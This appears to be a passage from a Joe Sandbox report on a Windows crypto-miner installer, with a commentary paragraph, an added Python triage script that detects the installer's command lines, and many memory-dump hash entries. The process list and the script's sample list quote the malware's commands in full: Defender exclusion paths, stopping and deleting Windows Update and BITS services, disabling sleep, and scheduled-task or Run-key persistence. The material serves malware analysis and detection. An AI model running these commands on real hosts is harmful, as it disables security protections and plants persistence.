                      Path:C:\Windows\System32\wbem\WMIC.exe
                      Wow64 process (32bit):false
                      Commandline:wmic PATH Win32_VideoController GET Name, VideoProcessor
                      Imagebase:0x7ff7d5530000
                      File size:521728 bytes
                      MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:64
                      Start time:12:58:30
                      Start date:02/11/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                      Imagebase:0x7ff71d940000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      Target ID:65
                      Start time:12:58:31
                      Start date:02/11/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c72c0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
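The process list above is the whole installer chain in plain sight: Defender exclusions for the user profile and Program Files (targets 33 and 64), Windows Update, WaaS medic, BITS and Delivery Optimization stopped and their service keys deleted (35, 40 to 54), sleep and hibernate timeouts zeroed so the miner is never suspended (36, 42 to 48), autostart via a SYSTEM scheduled task or an HKCU Run key (38), and a GPU inventory written to a log for the miner to read (59, 63). The following triage helper is an added example and not part of the Joe Sandbox report or the sample; it runs the command lines from this section (copied or abridged into a constructed list) through a small rule set, so a responder can re-use the same rules on EDR or Sysmon event 1 command lines. Rule names, the verdict thresholds and the helper names are this example's own choices.

```python
"""Classify Windows command lines into the defence-evasion, persistence and
impact behaviours seen in the process list above (added example, not part of
the sandbox report)."""
import re
from collections import defaultdict

# Constructed sample: command lines copied or abridged from targets 33, 35, 36,
# 38, 59/63 of the report, plus one benign conhost line for contrast.
SAMPLE_CMDLINES = [
    "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    'cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc '
    '& reg delete "HKLM\\SYSTEM\\CurrentControlSet\\Services\\UsoSvc" /f '
    '& reg delete "HKLM\\SYSTEM\\CurrentControlSet\\Services\\wuauserv" /f',
    "cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-dc 0",
    "powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal("
    "[Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole("
    "[Security.Principal.WindowsBuiltInRole]::Administrator)) { Register-ScheduledTask "
    "-Action (New-ScheduledTaskAction -Execute 'C:\\Program Files\\WindowsServices\\WindowsAutHost') "
    "-Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'WindowsAutHost' -User 'System' "
    "-RunLevel 'Highest' -Force } Else { reg add \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" "
    "/v \"WindowsAutHost\" /t REG_SZ /f /d 'C:\\Program Files\\WindowsServices\\WindowsAutHost' }",
    'cmd /c mkdir "C:\\Program Files\\Google\\Libs\\" & wmic PATH Win32_VideoController '
    'GET Name, VideoProcessor > "C:\\Program Files\\Google\\Libs\\g.log"',
    "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
]

# Services the sample kills: Update Orchestrator, WaaS medic, Windows Update,
# BITS and Delivery Optimization, i.e. everything that could patch the host
# or compete with the miner for bandwidth.
UPDATE_SERVICES = r"(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)"

# (label, pattern). Labels are this example's own naming, not report fields.
RULES = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+.*-ExclusionPath", re.I)),
    ("stop_update_service", re.compile(r"\bsc\s+stop\s+" + UPDATE_SERVICES, re.I)),
    ("delete_service_key", re.compile(
        r'reg\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\' + UPDATE_SERVICES, re.I)),
    ("disable_sleep", re.compile(r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0", re.I)),
    ("scheduled_task_persistence", re.compile(r"(Register-ScheduledTask|schtasks\s+/create)", re.I)),
    ("run_key_persistence", re.compile(
        r'reg\s+add\s+"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"', re.I)),
    ("gpu_recon", re.compile(r"wmic\s+PATH\s+Win32_VideoController", re.I)),
    # A random PowerShell comment at the start of the line (<#ujtstfzc#>) only
    # exists to vary the command-line hash; benign admin scripts rarely do this.
    ("powershell_comment_padding", re.compile(r"powershell\s+<#[^#]*#>", re.I)),
]

# Where the autostart entries point: the binary to collect during IR.
TASK_EXEC = re.compile(r"-Execute\s+'([^']+)'")
RUN_VALUE = re.compile(r"/d\s+'([^']+)'")


def classify(cmdline):
    """Return the sorted list of behaviour labels one command line triggers."""
    return sorted(label for label, rx in RULES if rx.search(cmdline))


def triage(cmdlines):
    """Group command lines by behaviour and give a coarse verdict.

    The chain is scored as a miner installer only when the host is both made
    quiet for the payload (AV exclusion, update services killed) and the
    payload is made to stick around (autostart or never-sleep settings).
    """
    hits = defaultdict(list)
    for line in cmdlines:
        for label in classify(line):
            hits[label].append(line)
    found = set(hits)
    evasion = found & {"defender_exclusion", "stop_update_service", "delete_service_key"}
    staying = found & {"scheduled_task_persistence", "run_key_persistence", "disable_sleep"}
    if evasion and staying:
        verdict = "likely-miner-installer"
    elif found:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return dict(hits), verdict


def persistence_targets(cmdlines):
    """Paths registered for autostart via scheduled task or Run key."""
    targets = set()
    for line in cmdlines:
        targets.update(TASK_EXEC.findall(line))
        targets.update(RUN_VALUE.findall(line))
    return sorted(targets)


if __name__ == "__main__":
    hits, verdict = triage(SAMPLE_CMDLINES)
    print("verdict:", verdict)
    for label in sorted(hits):
        print(f"  {label}: {len(hits[label])} line(s)")
    print("collect:", persistence_targets(SAMPLE_CMDLINES))
```

Two points worth keeping in mind when porting the rules. First, the `schtasks /create ...` text in target 38 is a bare string inside the pre-Windows-8 branch, so PowerShell only emits it and never runs it; on the analysis host the executed branch is `Register-ScheduledTask ... -User 'System' -RunLevel 'Highest'`, with the HKCU Run key as the non-admin fallback, which is why the rules key on those two forms rather than on `schtasks`. Second, the report shows the services being deleted from `HKLM\SYSTEM\CurrentControlSet\Services` rather than merely disabled, so on a live host the check is for the absence of those keys and for the Defender exclusion list, not for a stopped state.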

                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: bfa8a9ed668151fd2ac17dbdff765a646c917cc5dbd2537e2e223c5c486ac94d
                        • Instruction ID: 31b5074b707160cf6b8d24ff3c426e76431d7918c974644a79aaa7519c923e5a
                        • Opcode Fuzzy Hash: bfa8a9ed668151fd2ac17dbdff765a646c917cc5dbd2537e2e223c5c486ac94d
                        • Instruction Fuzzy Hash: 0A221732D0DD898FFB95DA2C94456BD7BE0FF55360F1406FAD088C718BDA25A84987C2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: __^
                        • API String ID: 0-4249834899
                        • Opcode ID: b03f8d4e21a743e26574559345b66f17929f6689b3cb704846f21ca5fc2230a3
                        • Instruction ID: c6bfdc9ba7b1e9c9a54bc7bf96934cc6e565978bd6184a23baa750060f46f622
                        • Opcode Fuzzy Hash: b03f8d4e21a743e26574559345b66f17929f6689b3cb704846f21ca5fc2230a3
                        • Instruction Fuzzy Hash: 24122932E0CD5A8FEB55DF3CD855AE97BA0FF56760F0402F6C088C7193CA26A8469781
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: a_H
                        • API String ID: 0-661530712
                        • Opcode ID: e248055ccfd44cbdc5e5530f85ce59b162cd47a888b1f2cad5d42876a369ba14
                        • Instruction ID: 0b7a59c15e30d4fea0eb30cb9f3dbc1491595ca32d3505f6bc04e5d24fa5cb70
                        • Opcode Fuzzy Hash: e248055ccfd44cbdc5e5530f85ce59b162cd47a888b1f2cad5d42876a369ba14
                        • Instruction Fuzzy Hash: 43E1C231A08A4D8FDF88DF58C445AF97BE1FF69350F1402AAD44DD7296CA25EC82CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 90dd6d310aa0eba7a1ae99f8bd283c6cdc256523b59aeef03cd555fd7a66cfd3
                        • Instruction ID: 4e4f66f866b808e63caede216bc5e82db596db646bdbfdb86bccea07f7d0f3d5
                        • Opcode Fuzzy Hash: 90dd6d310aa0eba7a1ae99f8bd283c6cdc256523b59aeef03cd555fd7a66cfd3
                        • Instruction Fuzzy Hash: 3C32B571A18A498FDB88EF1CC495AB977E1FF58350F1402ADD44AD7296CB35EC81CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2dd4dc253549c12f1cd00d6d512054d9e56aa6e1b4680f1d1e8d0f2178cab680
                        • Instruction ID: 1a77b47bff332b119516c1f65b54290ebbd9fb14f4ba00572862885fad1a61fa
                        • Opcode Fuzzy Hash: 2dd4dc253549c12f1cd00d6d512054d9e56aa6e1b4680f1d1e8d0f2178cab680
                        • Instruction Fuzzy Hash: 23F1FA22D0DBC55FE35A8B3858656B87FA0EF57760B0902FBD0C9CB193D9185C6AC392
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: abf414e41cbccfa759b66c6084eef55adb9b027465a42e8b791b87c1c4bab85f
                        • Instruction ID: a95e9d458a94577f4064aad8951ff3bb45286139770cdc7730d937305580f76a
                        • Opcode Fuzzy Hash: abf414e41cbccfa759b66c6084eef55adb9b027465a42e8b791b87c1c4bab85f
                        • Instruction Fuzzy Hash: 3AA13622D0DEC94FE7AA976C58642B57BE0EF57BA4B0802FBD089CB2D3D9099C15C351
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 21abb48f08595d1e9429d8ec8fd3aa0d56ca457320a6692ca02f38d46004dad8
                        • Instruction ID: 0d51aeaf6f93b57d035c180244d6a10f176e9473d82fced454b28b53ec964b91
                        • Opcode Fuzzy Hash: 21abb48f08595d1e9429d8ec8fd3aa0d56ca457320a6692ca02f38d46004dad8
                        • Instruction Fuzzy Hash: 7A81267091CE498FE75CEA18C495AB5B7E1EF953A0F1005BDD08AC71A7DE26FC828741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5eb9a23a2921367a7655df33baa056a43027459be30b35e20ae23bcf6f83959e
                        • Instruction ID: ee69be4349dfb76ccd9e7958c56b14c3ff9dd82c3befd10cfdf1f11017b37a21
                        • Opcode Fuzzy Hash: 5eb9a23a2921367a7655df33baa056a43027459be30b35e20ae23bcf6f83959e
                        • Instruction Fuzzy Hash: CC11487180EBC58FD7539B348C296947FB0AF23224F0A02DBD488CB0E3D6695809C793
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04ff4447e3f01aadf4de760a79516e09682a502b37c4b46239f2f6273df7196e
                        • Instruction ID: 8ba5a39b8bf7d09ff101bc6945b1d72d615f8fbd33fa1b37ae6e9f73991d6289
                        • Opcode Fuzzy Hash: 04ff4447e3f01aadf4de760a79516e09682a502b37c4b46239f2f6273df7196e
                        • Instruction Fuzzy Hash: 3461F27061CF498FE759EA18C494AB5B7E0EF953A0F1005BDD08AC72A7DA26FC428742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 073b2e97cbbd58ef13b46a49b57fa5fc6b65e7882feaa9aa1fae4807e88af24b
                        • Instruction ID: ad1fdd883b628ccbfec54fa0e338021bfe0881a181f7e60d02c6b366a91e6584
                        • Opcode Fuzzy Hash: 073b2e97cbbd58ef13b46a49b57fa5fc6b65e7882feaa9aa1fae4807e88af24b
                        • Instruction Fuzzy Hash: FF512832E1CE4A4FE79D8A1C54252B877D2EF94770B5802BAC08EC7293DE14E8658381
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0fea6373e9084f4049ba85d2a73469464eb38da6f484e3698117d85c86458045
                        • Instruction ID: cc312c1e0fd5441538dca926a91a1c5d01ae4e88ea90e61ab22ee1ac7515cb13
                        • Opcode Fuzzy Hash: 0fea6373e9084f4049ba85d2a73469464eb38da6f484e3698117d85c86458045
                        • Instruction Fuzzy Hash: C841057191CB884FDB199B189C066A87BE0EB59721F0442AFE089C7292CB756856CB83
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e37d90b6d775ac96ae26a3e6fb49905c666a62466b0bf21dfe113cd9eaa930d
                        • Instruction ID: ab84514d906bc135f6a1f6e6f1f3213f9ab2157576bf9e922f70228ff165024d
                        • Opcode Fuzzy Hash: 7e37d90b6d775ac96ae26a3e6fb49905c666a62466b0bf21dfe113cd9eaa930d
                        • Instruction Fuzzy Hash: D021F73161CA0D5FEB4CEA1CE8599B577D1EB99360B1402BEE44EC7292DD26FC838781
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83103848f27fc9535189bd0a4229ef821d6eb9809e34b608263e1e6f1cfaa315
                        • Instruction ID: 1d53250db96ebdeeec4d746557032cc8b0511fb80dd8b5541bcd544f175bcab3
                        • Opcode Fuzzy Hash: 83103848f27fc9535189bd0a4229ef821d6eb9809e34b608263e1e6f1cfaa315
                        • Instruction Fuzzy Hash: A531F662E0EE864FF7A9D26C18552786AD1FF46BA4B1802FAC08EC73D3DE099C54C311
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e32d15f3ff00899586a64a48ab3749cdea6aff1099b688e40131e9c807eb551
                        • Instruction ID: 15c8ea03720e7cb4ec30b9c5a2dd9d6b214a8b45f111136102425094c8c5bb74
                        • Opcode Fuzzy Hash: 3e32d15f3ff00899586a64a48ab3749cdea6aff1099b688e40131e9c807eb551
                        • Instruction Fuzzy Hash: 5121F63190CB4C8FEB58DF9C984A7E97BE0EB96331F04426FD049C3192D675A456CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 51da05615705b7c70d1f7df00bb48491b12bb0f6750d47154e3edac371e1f668
                        • Instruction ID: 1bf874c963c07e6b5599513ad24d8b1aa9c344b8d47e0b7f34262e214e4b6fbf
                        • Opcode Fuzzy Hash: 51da05615705b7c70d1f7df00bb48491b12bb0f6750d47154e3edac371e1f668
                        • Instruction Fuzzy Hash: 9721D222E1DE464FE3AD8A1C54696786AD1EF547B0B5902B9C08EC7292CE18EC758281
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e4ee30455bd0697671f8f4501fc918d10bd5bcf54aac7dd4d6d413aa12b8cdc6
                        • Instruction ID: ebf7725a20873553ce476a569bd6c6b4b126b6aefb45f1d612f958f2956130db
                        • Opcode Fuzzy Hash: e4ee30455bd0697671f8f4501fc918d10bd5bcf54aac7dd4d6d413aa12b8cdc6
                        • Instruction Fuzzy Hash: EE21083011CB498FD749DF18C0956B9B7E1FF95360F1009BDE4CAC72A2EA26A881C742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e4d9826924e8a30266539a25f4b356c935d0c9145539c39fa43934625b52dca
                        • Instruction ID: 00f694063be464df93fb7ceffc1d6517721dcb31682ac3760065b68d4da89ada
                        • Opcode Fuzzy Hash: 4e4d9826924e8a30266539a25f4b356c935d0c9145539c39fa43934625b52dca
                        • Instruction Fuzzy Hash: 4B21D83280DA964FD7076B289C565E57FB0EF12361B0902F3D498CB0B3DB1968A9C792
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 657dfb642105198fef64fa9e8cad43d5dc8edb2abcf969d4aaf6fcb901e94906
                        • Instruction ID: 0473597dc03e434d0194024dfe9d7b788d59a70e7d37f710f9c8bfb5192a2d5d
                        • Opcode Fuzzy Hash: 657dfb642105198fef64fa9e8cad43d5dc8edb2abcf969d4aaf6fcb901e94906
                        • Instruction Fuzzy Hash: 2411A032D0D9854FE3ADDA1894507BC67D0EF547B2B5902BAC08EC7293C909AC748285
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ff5c229f3ef6f29388a32c22fb735369338c2e7dc0aa970ff080a77efb73ca5
                        • Instruction ID: abf6e5c820529c349f1c2e7f863d34a47577fe882cc34e45504aed69ff0d0eaf
                        • Opcode Fuzzy Hash: 9ff5c229f3ef6f29388a32c22fb735369338c2e7dc0aa970ff080a77efb73ca5
                        • Instruction Fuzzy Hash: 64F0373275C6054FDB4CAA1CF4429B573D1EB95330B00017EE48BC2696D917E8428685
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f9ad75683ca1bb0ec92575b80262fa5ef93d8801f7d91920a0372b6ddab5456c
                        • Instruction ID: bb667de60621a85796333574d0b64de19606e4b684596ba91dcc96e94a520d2b
                        • Opcode Fuzzy Hash: f9ad75683ca1bb0ec92575b80262fa5ef93d8801f7d91920a0372b6ddab5456c
                        • Instruction Fuzzy Hash: 9BF0653276C6084FDB4CEA1CF8429B573D1EB99334B00016FE48BC2697D927E8838685
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000007.00000002.431624938.00007FF8164C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8164c0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 52eadc1c3aa611e797af6b64a1cc6bbaac244ec60dd5892aa98036c8f03269c8
                        • Instruction ID: 44d7ca100c655d26e8871465fd7e14e8688d20556be99fc0c76298ce2edbb8e4
                        • Opcode Fuzzy Hash: 52eadc1c3aa611e797af6b64a1cc6bbaac244ec60dd5892aa98036c8f03269c8
                        • Instruction Fuzzy Hash: 1EF0A73131CF044FD744EF1DD445765B7D0FBA8310F10452FE449C3651DA21E8818782
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: __^($__^)$__^<$__^=$__^J$__^K
                        • API String ID: 0-620535005
                        • Opcode ID: a2c4cd2d313b1323ac612f4e02095505c505fd5726257f8fafac3a71928821bd
                        • Instruction ID: 408c1f8cf9ce56bfcd5998cfba4aba52633c0cde4194ae18ddcf07fdf71a765b
                        • Opcode Fuzzy Hash: a2c4cd2d313b1323ac612f4e02095505c505fd5726257f8fafac3a71928821bd
                        • Instruction Fuzzy Hash: CE31A2A7E245269B97007B3DB4897D87380EF94771B050576C1ED8F0939B2438EE87C4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: __^$__^$__^$__^$__^
                        • API String ID: 0-481791169
                        • Opcode ID: a5d392971c5efcdabc8ea88078795a75993fe38ae65c84bacb5db6ff651d8431
                        • Instruction ID: ecefed927963e22a33d8efa05fe570eaccbb55e75d4a70eb8bb9fb93afe35546
                        • Opcode Fuzzy Hash: a5d392971c5efcdabc8ea88078795a75993fe38ae65c84bacb5db6ff651d8431
                        • Instruction Fuzzy Hash: A231A7A790DAD24FE3198A198CE5190BFA5FF52264B1E03FAC1D84F093FB3528578742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.430957349.00007FF8163F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff8163f0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: __^U$__^X$__^f$__^g
                        • API String ID: 0-2875829001
                        • Opcode ID: 1780bc7c7d34725f6d3d4a23cc88f8587946ef7d47dcfb634b98327477a688c3
                        • Instruction ID: 70c1177edf7128e7bf059f4ebd45fac20bfddeafef7ee2d4a67afe7dc32e103f
                        • Opcode Fuzzy Hash: 1780bc7c7d34725f6d3d4a23cc88f8587946ef7d47dcfb634b98327477a688c3
                        • Instruction Fuzzy Hash: F7512A53E0DAE14BE315566CB8152FD6BA0EF81770F4A01F7D1CC8B1D7A9295C4E4386
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000001A.00000002.473268471.00007FF8164E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff8164e0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9571b372a52f2a25b125d5887084a9937f2a17f582567f5b3275b8df8c0c8487
                        • Instruction ID: bf5b42da878477a788e75dce202841658e18b588da019f3bfe609ea34938d538
                        • Opcode Fuzzy Hash: 9571b372a52f2a25b125d5887084a9937f2a17f582567f5b3275b8df8c0c8487
                        • Instruction Fuzzy Hash: B0F1E322D0DEC94FE79696381864AB57FE1EF52BA0B0D02FBD098CB193D90C9CA5C351
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000001A.00000002.472700716.00007FF816410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff816410000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6348a5afe123a94b79261c27113744217eb678f3c2f499ede678acbffa01627b
                        • Instruction ID: 48ea4975acda071e4bb20f2a49c25280c3b0f0d3826476a4e7e6a73c78ff60a0
                        • Opcode Fuzzy Hash: 6348a5afe123a94b79261c27113744217eb678f3c2f499ede678acbffa01627b
                        • Instruction Fuzzy Hash: 0351563290CB864FE749DB28C8919B17BE0FF5636070442BEC0C9C71A3EA28B847C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000001A.00000002.473268471.00007FF8164E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8164E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_26_2_7ff8164e0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34ae80c9111cb92d3dcd173ed55277adc71a7b9584a039e9541432bbc38488ac
